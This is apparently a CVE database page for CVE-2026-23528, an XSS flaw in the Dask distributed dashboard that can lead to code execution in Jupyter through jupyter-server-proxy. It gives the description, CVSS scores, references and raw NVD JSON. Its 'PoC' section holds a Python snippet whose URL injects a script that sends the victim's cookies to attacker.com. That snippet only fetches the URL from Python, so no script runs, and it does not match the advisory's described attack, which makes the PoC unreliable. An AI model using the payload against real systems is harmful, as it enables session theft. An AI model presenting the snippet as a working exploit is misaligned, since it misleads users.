CVE-2026-23528

Description

Dask distributed is a distributed task scheduler for Dask. Prior to 2026.1.0, when Jupyter Lab, jupyter-server-proxy, and Dask distributed are all run together, it is possible to craft a URL which will result in code being executed by Jupyter due to a cross-side-scripting (XSS) bug in the Dask dashboard. It is possible for attackers to craft a phishing URL that assumes Jupyter Lab and Dask may be running on localhost and using default ports. If a user clicks on the malicious link it will open an error page in the Dask Dashboard via the Jupyter Lab proxy which will cause code to be executed by the default Jupyter Python kernel. This vulnerability is fixed in 2026.1.0.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:anaconda:dask:*:*:*:*:*:python:*:* - VULNERABLE

Dask distributed < 2026.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# 恶意URL构造
malicious_url = "http://localhost:8888/proxy/8787/?redirect=<script>fetch('http://attacker.com/exploit?cookie='+document.cookie)</script>"

# 发送恶意请求
response = requests.get(malicious_url)
print(f"Status: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23528
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23528
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23528/
[4] VulDB https://vuldb.com/cve/CVE-2026-23528
[5] https://github.com/dask/distributed/commit/ab72092a8a938923c2bb51a2cd14ca26614827fa
[6] https://github.com/dask/distributed/security/advisories/GHSA-c336-7962-wfj2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23528", "sourceIdentifier": "[email protected]", "published": "2026-01-16T17:15:54.640", "lastModified": "2026-03-12T18:29:56.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dask distributed is a distributed task scheduler for Dask. Prior to 2026.1.0, when Jupyter Lab, jupyter-server-proxy, and Dask distributed are all run together, it is possible to craft a URL which will result in code being executed by Jupyter due to a cross-side-scripting (XSS) bug in the Dask dashboard. It is possible for attackers to craft a phishing URL that assumes Jupyter Lab and Dask may be running on localhost and using default ports. If a user clicks on the malicious link it will open an error page in the Dask Dashboard via the Jupyter Lab proxy which will cause code to be executed by the default Jupyter Python kernel. This vulnerability is fixed in 2026.1.0."}, {"lang": "es", "value": "Dask distributed es un planificador de tareas distribuido para Dask. Antes de 2026.1.0, cuando Jupyter Lab, jupyter-server-proxy y Dask distributed se ejecutan todos juntos, es posible crear una URL que resultará en la ejecución de código por parte de Jupyter debido a un error de cross-site-scripting (XSS) en el panel de control de Dask. Es posible para los atacantes crear una URL de phishing que asume que Jupyter Lab y Dask pueden estar ejecutándose en localhost y usando puertos predeterminados. Si un usuario hace clic en el enlace malicioso, se abrirá una página de error en el panel de control de Dask a través del proxy de Jupyter Lab, lo que hará que se ejecute código por el kernel de Python predeterminado de Jupyter. Esta vulnerabilidad está corregida en 2026.1.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anaconda:dask:*:*:*:*:*:python:*:*", "versionEndExcluding": "2026.1.0", "matchCriteriaId": "45205ECC-5053-492F-8C7E-06EA48E6EEEA"}]}]}], "references": [{"url": "https://github.com/dask/distributed/commit/ab72092a8a938923c2bb51a2cd14ca26614827fa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dask/distributed/security/advisories/GHSA-c336-7962-wfj2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}